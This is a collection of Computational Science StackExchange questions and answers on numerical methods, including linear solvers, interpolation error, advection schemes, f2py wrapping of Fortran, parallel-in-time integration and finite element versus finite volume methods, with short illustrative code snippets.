python setup.py install --user If you are using easy_install and would like the package downloaded and installed: easy_install --prefix=$HOME/.local/ foo Update by RafiK pip install --user foo The following answer is provided for historical purposes: It's a little more work if you are using pip to download and install: pip install --install-option="--prefix=$HOME/.local" foo | {
"source": [
"https://scicomp.stackexchange.com/questions/2987",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/9/"
]
} |
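If you want to check where a --user install actually lands (the directory varies by platform), the standard library can tell you; a quick check I am adding for convenience:

```python
import site
print(site.getusersitepackages())   # e.g. ~/.local/lib/pythonX.Y/site-packages on Linux
```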
3,159 | Is it a good idea to use vector<vector<double>> (using std) to form a matrix class for high-performance scientific computing code? If the answer is no, why? Thanks | It's a bad idea because vector needs to allocate as many objects in space as there are rows in your matrix. Allocation is expensive, but primarily it is a bad idea because the data of your matrix now exists in a number of arrays scattered around memory, rather than all in one place where the processor cache can easily access it. It's also a wasteful storage format: std::vector stores two pointers, one to the beginning of the array and one to the end because the length of the array is flexible. On the other hand, for this to be a proper matrix, the lengths of all rows must be the same and so it would be sufficient to store the number of columns only once, rather than letting each row store its length independently. | {
"source": [
"https://scicomp.stackexchange.com/questions/3159",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1965/"
]
} |
3,262 | To my knowledge, there are 4 ways of solving a system of linear equations (correct me if there are more): If the system matrix is a full-rank square matrix, you can use Cramer’s Rule; Compute the inverse or the pseudoinverse of the system matrix; Use matrix decomposition methods (Gaussian or Gauss-Jordan elimination is considered as LU decomposition); Use iterative methods, such as the conjugate gradient method. In fact, you almost never want to solve the equations by using Cramer's rule or computing the inverse or pseudoinverse, especially for high dimensional matrices, so the first question is when to use decomposition methods and iterative methods, respectively. I guess it depends on the size and properties of the system matrix. The second question is, to your knowledge, what kind of decomposition methods or iterative methods are most suitable for a certain system matrix in terms of numerical stability and efficiency. For example, the conjugate gradient method is used to solve equations where the matrix is symmetric and positive definite, although it can also be applied to any linear equations by converting $\mathbf{A}x=b$ to $\mathbf{A}^{\rm T}\mathbf{A}x=\mathbf{A}^{\rm T}b$. Also, for a positive definite matrix, you can use the Cholesky decomposition method to seek the solution. But I don't know when to choose the CG method and when to choose Cholesky decomposition. My feeling is we'd better use the CG method for large matrices. For rectangular matrices, we can either use QR decomposition or SVD, but again I don't know how to choose one of them. For other matrices, I don't know how to choose the appropriate solver, such as for Hermitian/symmetric matrices, sparse matrices, band matrices, etc. | Your question is a bit like asking for which screwdriver to choose depending on the drive (slot, Phillips, Torx, ...): Besides there being too many, the choice also depends on whether you want to just tighten one screw or assemble a whole set of library shelves. Nevertheless, in partial answer to your question, here are some of the issues you should keep in mind when choosing a method for solving the linear system $Ax=b$.
I will also restrict myself to invertible matrices; the cases of over- or underdetermined systems are a different matter and should really be separate questions. As you rightly noted, option 1 and 2 are right out: Computing and applying the inverse matrix is a tremendously bad idea, since it is much more expensive and often numerically less stable than applying one of the other algorithms. That leaves you with the choice between direct and iterative methods. The first thing to consider is not the matrix $A$, but what you expect from the numerical solution $\tilde x$: How accurate does it have to be? Does $\tilde x$ have to solve the system up to machine precision, or are you satisfied with $\tilde x$ satisfying (say) $\|\tilde x - x^*\| < 10^{-3}$, where $x^*$ is the exact solution? How fast do you need it? The only relevant metric here is clock time on your machine - a method which scales perfectly on a huge cluster might not be the best choice if you don't have one of those, but you do have one of those shiny new Tesla cards. As there's no such thing as a free lunch, you usually have to decide on a trade-off between the two. After that, you start looking at the matrix $A$ (and your hardware) to decide on a good method (or rather, the method for which you can find a good implementation). (Note how I avoided writing "best" here...) The most relevant properties here are The structure : Is $A$ symmetric? Is it dense or sparse? Banded? The eigenvalues : Are they all positive (i.e., is $A$ positive definite)? Are they clustered? Do some of them have very small or very large magnitude? With this in mind, you then have to trawl the (huge) literature and evaluate the different methods you find for your specific problem. Here are some general remarks: If you really need (close to) machine precision for your solution, or if your matrix is small (say, up to $1000$ rows), it is hard to beat direct methods, especially for dense systems (since in this case, every matrix multiplication will be $\mathcal{O}(n^2)$, and if you need a lot of iterations, this might not be far from the $\mathcal{O}(n^3)$ a direct method needs). Also, LU decomposition (with pivoting) works for any invertible matrix, as opposed to most iterative methods. (Of course, if $A$ is symmetric and positive definite, you'd use Cholesky.) This is also true for (large) sparse matrices if you don't run into memory problems: Sparse matrices in general do not have a sparse LU decomposition, and if the factors do not fit into (fast) memory, these methods becomes unusable. In addition, direct methods have been around for a long time, and very high quality software exists (e.g., UMFPACK, MUMPS, SuperLU for sparse matrices) which can automatically exploit the band structure of $A$. If you need less accuracy, or cannot use direct methods, choose a Krylov method (e.g., CG if $A$ is symmetric positive definite, GMRES or BiCGStab if not) instead of a stationary method (such as Jacobi or Gauss-Seidel): These usually work much better, since their convergence is not determined by the spectral radius of $A$ but by (the square root) of the condition number and does not depend on the structure of the matrix. However, to get really good performance from a Krylov method, you need to choose a good preconditioner for your matrix - and that is more a craft than a science... 
If you repeatedly need to solve linear systems with the same matrix and different right hand sides, direct methods can still be faster than iterative methods since you only need to compute the decomposition once. (This assumes sequential solution; if you have all the right hand sides at the same time, you can use block Krylov methods.) Of course, these are just very rough guidelines: For any of the above statements, there likely exists a matrix for which the converse is true... Since you asked for references in the comments, here are some textbooks and review papers to get you started. (Neither of these - nor the set - is comprehensive; this question is much too broad, and depends too much on your particular problem.) Golub, van Loan: Matrix Computations (still the classical reference on matrix algorithms; the much expanded fourth edition now also discusses sparse matrices and has Matlab code in place of Fortran as well as an extensive bibliography) Davis: Direct Methods for Sparse Linear Systems (a good introduction on decomposition methods for sparse matrices) Duff: Direct Methods (review paper; more details on modern "multifrontal" direct methods for sparse matrices) Saad: Iterative methods for sparse linear systems (the theory and - to a lesser extent - practice of Krylov methods; also covers preconditioning) | {
"source": [
"https://scicomp.stackexchange.com/questions/3262",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1614/"
]
} |
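To make the direct-vs-iterative trade-off above concrete, here is a small SciPy sketch for a sparse symmetric positive definite system (the 1-D Poisson matrix is just a stand-in, and the solver calls are illustrative, not a recommendation for any particular matrix):

```python
import numpy as np
import scipy.sparse as sp
import scipy.sparse.linalg as spla

n = 10_000
A = sp.diags([-1.0, 2.0, -1.0], [-1, 0, 1], shape=(n, n), format='csc')  # SPD model problem
b = np.ones(n)

x_direct = spla.spsolve(A, b)                 # sparse direct factorization
x_cg, info = spla.cg(A, b, maxiter=50_000)    # Krylov method for SPD matrices
print(info, np.max(np.abs(x_direct - x_cg)))
```

For this badly conditioned model problem the unpreconditioned CG iteration count grows with $n$, which is exactly where the answer's remark about needing a good preconditioner comes in.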
3,451 | In my field of research the specification of experimental errors is commonly accepted and publications which fail to provide them are highly criticized. At the same time I often find that results of numerical computations are provided without any account of numerical errors, even though (or maybe because) often questionable numerical methods are at work. I am talking about errors which result from discretization and finite precision of numerical computations etc. Sure, these error estimates are not always easy to obtain, such as in the case of hydro-dynamical equations but often it seems to result from laziness while I believe that the specification of numerical error estimates should be standard just as much as they are for experimental results. Hence my question: Are there resources which discuss in some detail the treatment of numerical errors or propose scientific standards for the specification of numerical errors which result from typical approximations such as discretization? | Your question is asking about model Verification. You can find numerous resources on methods and standards by searching for Verification and Validation ( Roache 1997 , 2002 , 2004 , Oberkampf & Trucano 2002 , Salari & Knupp 2000 , Babuska & Oden 2004 ), as well as the broader topic of Uncertainty Quantification . Rather than elaborate on methods, I would like to highlight a community that took a firm stand on the issue. In 1986, Roache, Ghia, and White established the Journal of Fluids Engineering Editorial Policy Statement on the Control of Numerical Accuracy which opens with A professional problem exists in the computational fluid dynamics community and also in the broader area of computational physics. Namely, there is a need for higher standards on the control of numerical accuracy. [...] The problem is certainly not unique to the JFE and came into even sharper focus at the 1980-81 AFOSRHTTM-Stanford Conference on Complex Turbulent Flows. It was a conclusion of that conference's Evaluation Committee that, in most of the submissions to that conference, it was impossible to evaluate and compare the accuracy of different turbulence models, since one could not distinguish physical modeling errors from numerical errors related to the algorithm and grid. This is especially the case for first-order accurate methods and hybrid methods. They conclude with very direct guidelines: The Journal of Fluids Engineering will not accept for publication any paper reporting the numerical solution of a fluids engineering problem that fails to address the task of systematic truncation error testing and accuracy estimation. [...] we must make it clear that a single calculation in a fixed grid will not be acceptable , since it is impossible to infer an accuracy estimate from such a calculation. Also, the editors will not consider a reasonable agreement with experimental data to be sufficient proof of accuracy, especially if any adjustable parameters are involved, as in turbulence modeling. The current version contains a comprehensive set of criteria and represents a standard that, in my opinion, other fields should aspire to match. It is shameful that even today, awareness about the importance of model verification is absent in so many fields. | {
"source": [
"https://scicomp.stackexchange.com/questions/3451",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1943/"
]
} |
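In the spirit of the "systematic truncation error testing" that the policy statement demands, the most basic verification exercise is a grid-refinement study that measures the observed order of accuracy; a minimal example of my own, for a centred difference with a known exact answer:

```python
import numpy as np

f, dfdx = np.sin, np.cos        # manufactured problem with a known derivative
x0 = 1.0
hs = np.array([0.1, 0.05, 0.025, 0.0125])
errs = np.array([abs((f(x0 + h) - f(x0 - h)) / (2 * h) - dfdx(x0)) for h in hs])
orders = np.log(errs[:-1] / errs[1:]) / np.log(2.0)
print(orders)                   # should approach 2, the formal order of the scheme
```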
5,425 | I am trying to solve the advection equation but have a strange oscillation appearing in the solution when the wave reflects from the boundaries. If anybody has seen this artefact before I would be interested to know the cause and how to avoid it! This is an animated gif, open it in a separate window to view the animation (it will only play once, or not at all once it has been cached!) Notice that the propagation seems highly stable until the wave begins to reflect from the first boundary. What do you think could be happening here? I have spent a few days double checking my code and cannot find any errors. It is strange because there seem to be two propagating solutions: one positive and one negative; after the reflection from the first boundary. The solutions seem to be travelling along adjacent mesh points. The implementation details follow. The advection equation, $\frac{\partial u}{\partial t} = \boldsymbol{v}\frac{\partial u}{\partial x}$ where $\boldsymbol{v}$ is the propagation velocity. The Crank-Nicolson scheme is an unconditionally stable (pdf link) discretization for the advection equation provided $u(x)$ is slowly varying in space (only contains low-frequency components when Fourier transformed). The discretization I have applied is, $ \frac{\phi_{j}^{n+1} - \phi_{j}^{n}}{\Delta t} =
\boldsymbol{v} \left[ \frac{1-\beta}{2\Delta x} \left( \phi_{j+1}^{n} - \phi_{j-1}^{n} \right) + \frac{\beta}{2\Delta x} \left( \phi_{j+1}^{n+1} - \phi_{j-1}^{n+1} \right) \right]$ Putting the unknowns on the right-hand side enables this to be written in the linear form, $\beta r\phi_{j-1}^{n+1} + \phi_{j}^{n+1} -\beta r\phi_{j+1}^{n+1} = -(1-\beta)r\phi_{j-1}^{n} + \phi_{j}^{n} + (1-\beta)r\phi_{j+1}^{n}$ where $\beta=0.5$ (to take the time average evenly weighted between the present and future point) and $r=\boldsymbol{v}\frac{\Delta t}{2\Delta x}$. These set of equation have the matrix form $A\cdot u^{n+1} = M\cdot u^n$, where, $
\boldsymbol{A} =
\left(
\begin{matrix}
1 & -\beta r & & & 0 \\
\beta r & 1 & -\beta r & & \\
& \ddots & \ddots & \ddots & \\
& & \beta r & 1 & -\beta r \\
0 & & & \beta r & 1 \\
\end{matrix}
\right)
$ $
\boldsymbol{M} =
\left(
\begin{matrix}
1 & (1 - \beta)r & & & 0 \\
-(1 - \beta)r & 1 & (1 - \beta)r & & \\
& \ddots & \ddots & \ddots & \\
& & -(1 - \beta)r & 1 & (1 - \beta)r \\
0 & & &-(1 - \beta)r & 1 \\
\end{matrix}
\right)
$ The vectors $u^n$ and $u^{n+1}$ are the known and unknown of the quantity we want to solve for. I then apply closed Neumann boundary conditions on the left and right boundaries. By closed boundaries I mean $\frac{\partial u}{\partial x} = 0$ on both interfaces. For closed boundaries it turns out that (I won't show my working here) we just need to solve the above matrix equation. As pointed out by @DavidKetcheson, the above matrix equations actually describe Dirichlet boundary conditions . For Neumann boundary conditions, $
\boldsymbol{A} =
\left(
\begin{matrix}
1 & 0 & & & 0 \\
\beta r & 1 & -\beta r & & \\
& \ddots & \ddots & \ddots & \\
& & \beta r & 1 & -\beta r \\
0 & & & 0 & 1 \\
\end{matrix}
\right)
$ Update The behaviour seems fairly independent of the choice of constants I use, but these are the values for the plot you see above: $\boldsymbol{v}$=2 dx=0.2 dt=0.005 $\sigma$=2 (Gaussian hwhm) $\beta$=0.5 Update II A simulation with non-zero diffusion coefficient, $D=1$ (see comments below), the oscillation goes away, but the wave no longer reflects!? I don't understand why? | The equation you're solving does not permit right-going solutions, so there is no such thing as a reflecting boundary condition for this equation. If you consider the characteristics, you'll realize that you can only impose a boundary condition at the right boundary. You are trying to impose a homogeneous Dirichlet boundary condition at the left boundary, which is mathematically invalid. To reiterate: the method of characteristics says that the solution must be constant along any line of the form $x-\nu t = C$ for any constant $C$ . Thus the solution along the left boundary is determined by the solution at earlier times inside your problem domain; you cannot impose a solution there. Unlike the equation, your numerical scheme does admit right-going solutions. The right-going modes are referred to as parasitic modes and involve very high frequencies. Notice that the right-going wave is a sawtooth wave packet, associated with the highest frequencies that can be represented on your grid. That wave is purely a numerical artifact, created by your discretization. For emphasis: you have not written down the full initial-boundary value problem that you are trying to solve. If you do, it will be clear that it is not a mathematically well-posed problem. I'm glad you posted this here, though, as it's a beautiful illustration of what can happen when you discretize a problem that's not well-posed, and of the phenomenon of parasitic modes. A big +1 for your question from me. | {
"source": [
"https://scicomp.stackexchange.com/questions/5425",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/3691/"
]
} |
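For reference, the Crank-Nicolson system in the question is easy to reproduce with SciPy (a sketch using the question's parameter values and the first, Dirichlet-type, pair of matrices; the grid extent is my own choice). The answer attributes the sawtooth to parasitic modes of a discretization of an ill-posed boundary setup, so this sketch only reproduces the linear-algebra side:

```python
import numpy as np
import scipy.sparse as sp
import scipy.sparse.linalg as spla

v, dx, dt, beta = 2.0, 0.2, 0.005, 0.5
n = 101
r = v * dt / (2 * dx)

off = np.ones(n - 1)
A = sp.diags([beta * r * off, np.ones(n), -beta * r * off], [-1, 0, 1], format='csc')
M = sp.diags([-(1 - beta) * r * off, np.ones(n), (1 - beta) * r * off], [-1, 0, 1], format='csc')

x = np.arange(n) * dx                    # grid spacing dx = 0.2
u = np.exp(-((x - x.mean())**2) / (2 * 2.0**2))   # Gaussian initial condition, sigma = 2
step = spla.factorized(A)                # factor the tridiagonal matrix once
for _ in range(400):
    u = step(M @ u)                      # one Crank-Nicolson time step
```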
5,682 | Experiment description: In Lagrange interpolation, the exact equation is sampled at $N$ points (polynomial order $N - 1$ ) and it is interpolated at 101 points. Here $N$ is varied from 2 to 64. Each time $L_1$ , $L_2$ and $L_\infty$ error plots are prepared. It is seen that, when the function is sampled at equi-spaced points, the error drops initially (it happens till $N$ is less than about 15 or so) and then the error goes up with further increase in $N$ . Whereas, if the initial sampling is done at Legendre-Gauss (LG) points (roots of Legendre polynomials), or Legendre-Gauss-Lobatto (LGL) points (roots of Lobatto polynomials), the error drops to machine level and doesn't increase when $N$ is further increased. My questions are, What exactly happens in the case of equi-spaced points? Why does increase in polynomial order cause the error to rise after a certain point? Does this also mean that if I use equi-spaced points for WENO / ENO reconstruction (using Lagrange polynomials), then in the smooth region, I would get errors? (well, these are only hypothetical questions (for my understanding), it is really not reasonable to reconstruct polynomial of the order of 15 or higher for WENO scheme) Additional details: Function approximated: $f(x) = \cos(\frac{\pi}{2}~x)$ , $x \in [-1, 1]$ $x$ divided into $N$ equispaced (and later LG) points. The function is interpolated at 101 points each time. Results: a) Equi-spaced points (interpolation for $N = 65$ ): b) Equi-spaced points (error plot, log scale): a) LG points (Interpolation for $N = 65$ ): b) LG points (error plot, log scale): | The problem with equispaced points is that the interpolation error polynomial, i.e. $$ f(x) - P_n(x) = \frac{f^{(n+1)}(\xi)}{(n+1)!} \prod_{i=0}^n (x - x_i),\quad \xi\in[x_0,x_n] $$ behaves differently for different sets of nodes $x_i$. In the case of equispaced points, this polynomial blows up at the edges. If you use Gauss-Legendre points, the error polynomial is significantly better behaved, i.e. it doesn't blow up at the edges. If you use Chebyshev nodes , this polynomial equioscillates and the interpolation error is minimal. | {
"source": [
"https://scicomp.stackexchange.com/questions/5682",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1567/"
]
} |
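The experiment is easy to reproduce with a stable (barycentric) interpolation routine; in this sketch of mine, Chebyshev nodes stand in for the LG/LGL points used in the question, with the same qualitative behaviour:

```python
import numpy as np
from scipy.interpolate import barycentric_interpolate

f = lambda x: np.cos(0.5 * np.pi * x)
xf = np.linspace(-1, 1, 101)             # 101 evaluation points, as in the question

for n in (8, 16, 32, 64):
    xe = np.linspace(-1, 1, n)                               # equispaced nodes
    xc = np.cos((2 * np.arange(n) + 1) * np.pi / (2 * n))    # Chebyshev nodes
    err_e = np.max(np.abs(barycentric_interpolate(xe, f(xe), xf) - f(xf)))
    err_c = np.max(np.abs(barycentric_interpolate(xc, f(xc), xf) - f(xf)))
    print(n, err_e, err_c)    # equispaced error eventually grows; Chebyshev stays tiny
```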
6,961 | I would like to use f2py with modern Fortran. In particular I'm trying to get the following basic example to work. This is the smallest useful example I could generate. ! alloc_test.f90
subroutine f(x, z)
implicit none
! Argument Declarations !
real*8, intent(in) :: x(:)
real*8, intent(out) :: z(:)
! Variable Declarations !
real*8, allocatable :: y(:)
integer :: n
! Variable Initializations !
n = size(x)
allocate(y(n))
! Statements !
y(:) = 1.0
z = x + y
deallocate(y)
return
end subroutine f Note that n is inferred from the shape of input parameter x . Note that y is allocated and deallocated within the body of the subroutine. When I compile this with f2py f2py -c alloc_test.f90 -m alloc And then run in Python from alloc import f
from numpy import ones
x = ones(5)
print f(x) I get the following error ValueError: failed to create intent(cache|hide)|optional array-- must have defined dimensions but got (-1,) So I go and create and edit the pyf file manually f2py -h alloc_test.pyf -m alloc alloc_test.f90 Original python module alloc ! in
interface ! in :alloc
subroutine f(x,z) ! in :alloc:alloc_test.f90
real*8 dimension(:),intent(in) :: x
real*8 dimension(:),intent(out) :: z
end subroutine f
end interface
end python module alloc Modified python module alloc ! in
interface ! in :alloc
subroutine f(x,z,n) ! in :alloc:alloc_test.f90
integer, intent(in) :: n
real*8 dimension(n),intent(in) :: x
real*8 dimension(n),intent(out) :: z
end subroutine f
end interface
end python module alloc Now it runs but the values of the output z are always 0 . Some debug printing reveals that n has the value 0 within the subroutine f . I assume that I'm missing some f2py header magic to manage this situation properly. More generally what is the best way to link the above subroutine into Python? I'd strongly prefer not to have to modify the subroutine itself. | I am not super familiar with f2py internals, but I am very familiar with wrapping Fortran. F2py just automates some or all of the things below. You first need to export to C using the iso_c_binding module, as described for example here: http://fortran90.org/src/best-practices.html#interfacing-with-c Disclaimer: I am the main author of the fortran90.org pages. This is the only platform and compiler independent way of calling Fortran from C. This is F2003, so these days there is no reason to use any other way. You can only export/call arrays with full length specified (explicit shape), that is: integer(c_int), intent(in) :: N
real(c_double), intent(out) :: mesh(N) but not assume shape: real(c_double), intent(out) :: mesh(:) That is because the C language does not support such arrays itself. There is talk to include such support in either F2008 or later (I am not sure), and the way it would work is through some supporting C data structures, as you need to carry shape information about the array. In Fortran, you should mainly use the assume shape, only in special cases you should use explicit shape, as described here: http://fortran90.org/src/best-practices.html#arrays That means, that you need to write a simple wrapper around your assume shape subroutine, that will wrap things into explicit shape arrays, per my first link above. Once you have a C signature, just call it from Python in any way you like, I use Cython, but you can use ctype, or C/API by hand. The deallocate(y) statement is not needed, Fortran deallocates automatically. http://fortran90.org/src/best-practices.html#allocatable-arrays real*8 should not be used, but rather real(dp) : http://fortran90.org/src/best-practices.html#floating-point-numbers The statement y(:) = 1.0 is assigning 1.0 in single precision, so the rest of digits will be random! This is a common pitfall: http://fortran90.org/src/gotchas.html#floating-point-numbers You need to use y(:) = 1.0_dp . Instead of writing y(:) = 1.0_dp , you can just write y = 1 , that's it. You can assign integer to a floating point number without losing accuracy, and you don't need to put the redundant (:) in there. Much simpler. Instead of y = 1
z = x + y just use z = x + 1 and don't bother with the y array at all. You don't need the "return" statement at the end of the subroutine. Finally, you should probably be using modules, and just put implicit none on the module level and you don't need to repeat it in each subroutine. Otherwise it looks good to me. Here is the code following the suggestions 1-10 above:: module test
use iso_c_binding, only: c_double, c_int
implicit none
integer, parameter :: dp=kind(0.d0)
contains
subroutine f(x, z)
real(dp), intent(in) :: x(:)
real(dp), intent(out) :: z(:)
z = x + 1
end subroutine
subroutine c_f(n, x, z) bind(c)
integer(c_int), intent(in) :: n
real(c_double), intent(in) :: x(n)
real(c_double), intent(out) :: z(n)
call f(x, z)
end subroutine
end module It shows the simplified subroutine as well as a C wrapper. As far as f2py, it probably tries to write this wrapper for you and fails. I am also not sure whether it is using the iso_c_binding module. So for all these reasons, I prefer to wrap things by hand. Then it's exactly clear what is happening. | {
"source": [
"https://scicomp.stackexchange.com/questions/6961",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/19/"
]
} |
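The answer above notes that once the bind(c) wrapper exists, it can be called from Python in any way you like, ctypes being one option. Here is a minimal sketch of that last step; the shared-library name (libtest.so) and the compile command in the comment are illustrative assumptions, not part of the original answer.

# Hypothetical build step (adjust to your compiler/platform):
#   gfortran -shared -fPIC test.f90 -o libtest.so
import ctypes
import numpy as np

lib = ctypes.CDLL("./libtest.so")        # load the compiled Fortran library
lib.c_f.restype = None                   # the bind(c) subroutine returns nothing

x = np.array([1.0, 2.0, 3.0])
z = np.empty_like(x)
n = ctypes.c_int(x.size)

# n is intent(in) without the 'value' attribute, so it is passed by reference;
# the arrays are passed as plain pointers to double.
lib.c_f(ctypes.byref(n),
        x.ctypes.data_as(ctypes.POINTER(ctypes.c_double)),
        z.ctypes.data_as(ctypes.POINTER(ctypes.c_double)))

print(z)                                 # expected: [2. 3. 4.]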
6,965 | I know some of the places where SPD linear systems arise, such as elliptic PDEs and normal equations. Can I have a more comprehensive list of scientific applications which require solving an SPD linear system? I am especially interested in cases where the matrix is not sparse and cases where the matrix might not be available directly. Thanks | | {
"source": [
"https://scicomp.stackexchange.com/questions/6965",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/3360/"
]
} |
7,714 | I'm currently looking into parallel methods for ODE integration. There is a lot of new and old literature out there describing a wide range of approaches, but I haven't found any recent surveys or overview articles describing the topic in general. There's the book by Burrage [1], but it's almost 20 years old and hence does not cover many of the more modern ideas like the parareal algorithm. [1] K. Burrage, Parallel and Sequential Methods for Ordinary Differential Equations, Clarendon Press, Oxford, 1995 | I'm not aware of any recent overview articles, but I am actively involved in the development of the PFASST algorithm so can share some thoughts. There are three broad classes of time-parallel techniques that I am aware of: across the method — independent stages of RK or extrapolation integrators can be evaluated in parallel; see also the RIDC (revisionist integral deferred correction algorithm) across the problem — waveform relaxation across the time-domain — Parareal; PITA (parallel in time algorithm); and PFASST (parallel full approximation scheme in space and time). Methods that parallelize across the method usually perform very close to spec but don't scale beyond a handful of (time) processors. Typically they are relatively easier to implement than other methods and are a good if you have a few extra cores lying around and are looking for predictable and modest speedups. Methods that parallelize across the time domain include Parareal, PITA, PFASST. These methods are all iterative and are comprised of inexpensive (but inaccurate) "coarse" propagators and expensive (but accurate) "fine" propagators. They achieve parallel efficiency by iteratively evaluating the fine propagator in parallel to improve a serial solution obtained using the coarse propagator. The Parareal and PITA algorithms suffer from a rather unfortunate upper bound on their parallel efficiency $E$: $E < 1/K$ where $K$ is the number of iterations required to obtain convergence throughout the domain. For example, if your Parareal implementation required 10 iterations to converge and you are using 100 (time) processors, the largest speedup you could hope for would be 10x. The PFASST algorithm relaxes this upper bound by hybridizing the time-parallel iterations with the iterations of the Spectral Deferred Correction time-stepping method and incorporating Full Approximation Scheme corrections to a hierarchy of space/time discretizations. Lots of games can be played with all of these methods to try and speed them up, and it seems as though the performance of these across-the-domain techniques depends on what problem you are solving and which techniques are available for speeding up the coarse propagator (coarsened grids, coarsened operators, coarsened physics etc.). Some references (see also references listed in the papers): This paper demonstrates how various methods can be parallelised across the method: A theoretical comparison of high order explicit Runge-Kutta, extrapolation, and deferred correction methods ; Ketcheson and Waheed. This paper also shows a nice way of parallelizing across the method, and introduces the RIDC algorithm: Parallel high-order integrators ; Christlieb, MacDonald, Ong. This paper introduces the PITA algorithm: A Time-Parallel Implicit Method for Accelerating the Solution of Nonlinear Structural Dynamics Problems ; Cortial and Farhat. There are lots of papers on Parareal (just Google it). 
Here is a paper on the Nievergelt method: A minimal communication approach to parallel time integration ; Barker. This paper introduces PFASST: Toward an efficient parallel in time method for partial differential equations ; Emmett and Minion. This paper describes a neat application of PFASST: A massively space-time parallel N-body solver ; Speck, Ruprecht, Krause, Emmett, Minion, Windel, Gibbon. I have written two implementations of PFASST that are available on the 'net: PyPFASST and libpfasst .
"source": [
"https://scicomp.stackexchange.com/questions/7714",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/4230/"
]
} |
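To make the coarse/fine propagator structure described in the answer above more concrete, here is a minimal sketch of the standard Parareal iteration for the scalar test problem y' = lam*y. The specific propagators (one explicit Euler step vs. many) and all parameter values are illustrative choices, not taken from the answer or the cited papers.

import numpy as np

lam = -1.0                         # test problem y' = lam*y, y(0) = 1
T, N = 2.0, 20                     # horizon and number of time slices
dt = T / N

def coarse(y):                     # cheap, inaccurate propagator over one slice
    return y + dt * lam * y

def fine(y, m=50):                 # expensive, accurate propagator over one slice
    for _ in range(m):
        y = y + (dt / m) * lam * y
    return y

U = np.empty(N + 1)                # serial coarse sweep gives the initial guess
U[0] = 1.0
for n in range(N):
    U[n + 1] = coarse(U[n])

for k in range(5):                 # Parareal iterations
    F = np.array([fine(U[n]) for n in range(N)])   # independent: parallelizable
    V = np.empty_like(U)
    V[0] = U[0]
    for n in range(N):             # cheap serial correction sweep
        V[n + 1] = coarse(V[n]) + F[n] - coarse(U[n])
    U = V

print(abs(U[-1] - np.exp(lam * T)))   # error at the final time shrinks with each iteration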
8,217 | There is an obvious difference between finite difference and the finite volume method (moving from point definition of the equations to integral averages over cells). But I find FEM and FVM to be very similar; they both use integral form and average over cells. What is the FEM method doing that the FVM is not? I have read a little background on the FEM I understand that the equations are written in the weak form, this gives the method a slightly different stating point than the FVM. However, I don't understand on a conceptual level what the differences are. Does FEM make some assumption regarding how the unknown varies inside the cell, can't this also be done with FVM? I am mostly coming from 1D perspective so maybe FEM has advantages with more than one dimension? I haven't found much information available on this topic on the net. Wikipedia has a section on how the FEM is different from finite difference method, but that is about it, http://en.wikipedia.org/wiki/Finite_element_method#Comparison_to_the_finite_difference_method . | Finite Element: volumetric integrals, internal polynomial order Classical finite element methods assume continuous or weakly continuous approximation spaces and ask for volumetric integrals of the weak form to be satisfied. The order of accuracy is increased by raising the approximation order within elements. The methods are not exactly conservative, thus often struggle with stability for discontinuous processes. Finite Volume: surface integrals, fluxes from discontinuous data, reconstruction order Finite volume methods use piecewise constant approximation spaces and ask for integrals against piecewise constant test functions to be satisfied. This yields exact conservation statements. The volume integral is converted to a surface integral and the entire physics is specified in terms of fluxes in those surface integrals. For first-order hyperbolic problems, this is a Riemann solve. Second order/elliptic fluxes are more subtle. Order of accuracy is increased by using neighbors to (conservatively) reconstruct higher order representations of the state inside elements (slope reconstruction/limiting) or by reconstructing fluxes (flux limiting). The reconstruction process is usually nonlinear to control oscillations around discontinuous features of the solution, see total variation diminishing (TVD) and essentially non-oscillatory (ENO/WENO) methods. A nonlinear discretization is necessary to simultaneously obtain both higher than first order accuracy in smooth regions and bounded total variation across discontinuities, see Godunov's theorem . Comments Both FE and FV are easy to define up to second order accuracy on unstructured grids. FE is easier to go beyond second order on unstructured grids. FV handles non-conforming meshes more easily and robustly. Combining FE and FV The methods can be married in multiple ways. Discontinuous Galerkin methods are finite element methods that use discontinuous basis functions, thus acquiring Riemann solvers and more robustness for discontinuous processes (especially hyperbolic). DG methods can be used with nonlinear limiters (usually with some reduction in accuracy), but satisfy a cell-wise entropy inequality without limiting and can thus be used without limiting for some problems where other schemes require limiters. (This is especially useful for adjoint-based optimization since it makes the discrete adjoint more representative of the continuous adjoint equations.) 
Mixed FE methods for elliptic problems use discontinuous basis functions and after some choices of quadrature, can be reinterpreted as standard finite volume methods, see this answer for more. Reconstruction DG methods (aka. $P_N P_M$ or "Recovery DG") use both FV-like conservative reconstruction and internal order enrichment, and are thus a superset of FV and DG methods. | {
"source": [
"https://scicomp.stackexchange.com/questions/8217",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/3691/"
]
} |
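As a deliberately simple illustration of the two viewpoints in the answer above (volumetric weak-form integrals vs. surface fluxes), here is a sketch that discretizes -u'' = 1 on (0,1) with homogeneous Dirichlet data, once with piecewise-linear finite elements and once with a cell-centered finite volume scheme. The model problem and grid are illustrative choices, not part of the answer.

import numpy as np

N = 32
h = 1.0 / N

# P1 finite elements: assemble volumetric integrals of the weak form.
# Unknowns are the interior nodal values u_1 .. u_{N-1}.
K = np.zeros((N - 1, N - 1))
F = np.zeros(N - 1)
for e in range(N):                       # element [x_e, x_{e+1}]
    for a in (0, 1):
        i = e + a - 1                    # global node index; -1 and N-1 are boundary nodes
        if 0 <= i < N - 1:
            F[i] += h / 2                # load integral of f * phi_i with f = 1
            for b in (0, 1):
                j = e + b - 1
                if 0 <= j < N - 1:
                    K[i, j] += (1.0 if a == b else -1.0) / h
u_fe = np.linalg.solve(K, F)

# Cell-centered finite volumes: balance numerical fluxes over each cell.
# Unknowns are cell averages; the interior face flux is -(u_R - u_L)/h.
A = np.zeros((N, N))
b = np.full(N, h)                        # integral of f over each cell
for i in range(N):
    A[i, i] = 2.0 / h
    if i > 0:
        A[i, i - 1] = -1.0 / h
    else:
        A[i, i] += 1.0 / h               # Dirichlet face at x = 0 (distance h/2 to the cell center)
    if i < N - 1:
        A[i, i + 1] = -1.0 / h
    else:
        A[i, i] += 1.0 / h               # Dirichlet face at x = 1 (distance h/2 to the cell center)
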